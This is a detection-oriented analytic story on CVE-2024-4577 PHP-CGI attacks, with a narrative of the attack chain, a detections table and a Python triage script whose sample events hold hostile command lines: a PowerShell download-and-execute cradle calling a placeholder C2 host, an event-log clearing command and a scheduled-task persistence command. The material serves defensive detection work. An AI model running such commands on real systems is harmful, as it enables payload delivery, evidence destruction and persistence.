Analytics Story: PHP-CGI RCE Attack on Japanese Organizations

Description

This analytic story covers attacks exploiting CVE-2024-4577, a remote code execution (RCE) vulnerability in the PHP-CGI implementation on Windows. Attackers leverage this vulnerability to gain initial access, deploy Cobalt Strike using the "TaoWu" kit for post-exploitation activities, and establish persistence. The attacks primarily target organizations across various sectors including technology, telecommunications, entertainment, education, and e-commerce.

Why it matters

The attack begins with the exploitation of CVE-2024-4577, a critical RCE vulnerability in Windows-based PHP installations using CGI configurations. The vulnerability arises from the "Best-Fit" behavior in Windows code pages, where certain characters are replaced in command-line inputs, causing the PHP-CGI module to misinterpret these characters as PHP options and allowing arbitrary code execution. After identifying vulnerable targets, attackers use a Python exploit script to send specially crafted POST requests containing PHP code. Upon successful exploitation, a PowerShell download cradle retrieves and executes a PowerShell injector script from a command and control (C2) server, which deploys Cobalt Strike reverse HTTP shellcode.

Post-exploitation activities include reconnaissance (gathering system information), privilege escalation (using the JuicyPotato, RottenPotato and SweetPotato exploits), persistence (modifying registry keys, creating scheduled tasks and Windows services), defense evasion (clearing event logs), lateral movement (network scanning and abusing Group Policy Objects), and credential theft (using Mimikatz). The attackers use the "TaoWu" Cobalt Strike kit for many of these actions and have access to additional adversarial frameworks hosted on an Alibaba Cloud container registry, including Blue-Lotus (a JavaScript webshell and XSS framework), BeEF (Browser Exploitation Framework), and Viper C2.

Detection opportunities include monitoring for suspicious PowerShell download cradles, unusual process spawning patterns (a web server worker process launching a shell), registry modifications for persistence, scheduled task creation, Windows service creation, event log clearing, and network scanning activities.

Detections

Name | Technique | Type
--- | --- | ---
Any Powershell DownloadFile | PowerShell, Ingress Tool Transfer | TTP
Any Powershell DownloadString | PowerShell, Ingress Tool Transfer | TTP
Attacker Tools On Endpoint | OS Credential Dumping, Match Legitimate Name or Location, Active Scanning | TTP
Detect Regsvr32 Application Control Bypass | Regsvr32 | TTP
PowerShell 4104 Hunting | PowerShell | Hunting
PowerShell WebRequest Using Memory Stream | PowerShell, Ingress Tool Transfer, Fileless Storage | TTP
System User Discovery With Whoami | System Owner/User Discovery | Hunting
W3WP Spawning Shell | Web Shell | TTP
Windows Process Writing File to World Writable Path | Mshta | Hunting
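The "Why it matters" narrative and the detections table above describe the same behaviours from two sides: the attack chain (web server spawning a shell, PowerShell download cradle, whoami discovery, event log clearing, scheduled task and service creation) and the named detections that cover them. The script below is an added example, not Splunk's detection content and not code from the story's authors: it runs a small set of rule predicates over constructed process-creation records (field names parent_image, image and command_line are an assumption modelled loosely on Sysmon EventID 1 / Security 4688 fields) and reports which phase of the story each hit belongs to. Treating php-cgi.exe as a web-server parent alongside w3wp.exe is an assumption for the CGI deployment this story describes.

```python
"""Added example: rule-based triage of process-creation records for the behaviours
named in this analytic story. Sample events are constructed for the example."""
import re
from typing import Callable, Dict, List, Tuple

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# w3wp.exe is the IIS worker named by "W3WP Spawning Shell"; php-cgi.exe as a
# parent is an assumption for the CGI setup the story describes.
WEB_PARENTS = {"w3wp.exe", "php-cgi.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.IGNORECASE) is not None


# (rule name, phase from the story narrative, predicate over one event dict)
RULES: List[Tuple[str, str, Callable[[Dict[str, str]], bool]]] = [
    ("ps_download_cradle", "ingress tool transfer",
     lambda e: basename(e["image"]) in POWERSHELL
     and _has(r"Download(String|File)\s*\(", e["command_line"])),
    ("ps_webrequest_memorystream", "ingress tool transfer",
     lambda e: basename(e["image"]) in POWERSHELL
     and _has(r"WebRequest", e["command_line"])
     and _has(r"MemoryStream", e["command_line"])),
    ("web_server_spawning_shell", "web shell",
     lambda e: basename(e["parent_image"]) in WEB_PARENTS
     and basename(e["image"]) in SHELLS),
    ("whoami_discovery", "discovery",
     lambda e: basename(e["image"]) == "whoami.exe"),
    ("event_log_cleared", "defense evasion",
     lambda e: _has(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", e["command_line"])
     or _has(r"Clear-EventLog", e["command_line"])),
    ("scheduled_task_created", "persistence",
     lambda e: basename(e["image"]) == "schtasks.exe"
     and _has(r"/create\b", e["command_line"])),
    ("service_created", "persistence",
     lambda e: basename(e["image"]) == "sc.exe"
     and _has(r"\bcreate\b", e["command_line"])),
]

# Constructed sample events (hostnames and paths are placeholders, not real IoCs).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\whoami.exe",
     "command_line": "whoami"},
    {"parent_image": r"C:\php\php-cgi.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://c2.example.invalid/x.ps1')\""},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "command_line": "wevtutil cl Security"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": "schtasks /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\Public\\u.exe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Date"},  # benign: should trip nothing
]


def evaluate(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """One hit per (event, rule) pair; a single event can trip several rules."""
    hits: List[Dict[str, object]] = []
    for idx, event in enumerate(events):
        for name, phase, predicate in RULES:
            if predicate(event):
                hits.append({"event": idx, "rule": name, "phase": phase,
                             "image": basename(event["image"])})
    return hits


def chain_phases(hits: List[Dict[str, object]]) -> List[str]:
    """Distinct phases in first-seen order. Several phases on one host in a short
    window is the pattern the story's detections are meant to surface together."""
    seen: List[str] = []
    for hit in hits:
        if hit["phase"] not in seen:
            seen.append(str(hit["phase"]))
    return seen


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for hit in found:
        print(hit)
    print("phases observed:", chain_phases(found))
```

Each rule is deliberately narrow and keyed to a process image or a command-line token, so a single hit is only a lead; the chain_phases summary is the part worth alerting on, since a web-worker-spawned shell followed by a download cradle, discovery and log clearing on the same host is the sequence this story describes.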

Data Sources

Name | Platform | Sourcetype | Source
--- | --- | --- | ---
CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike
Powershell Script Block Logging 4104 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 | Windows | xmlwineventlog | XmlWinEventLog:Security

Source: GitHub | Version: 1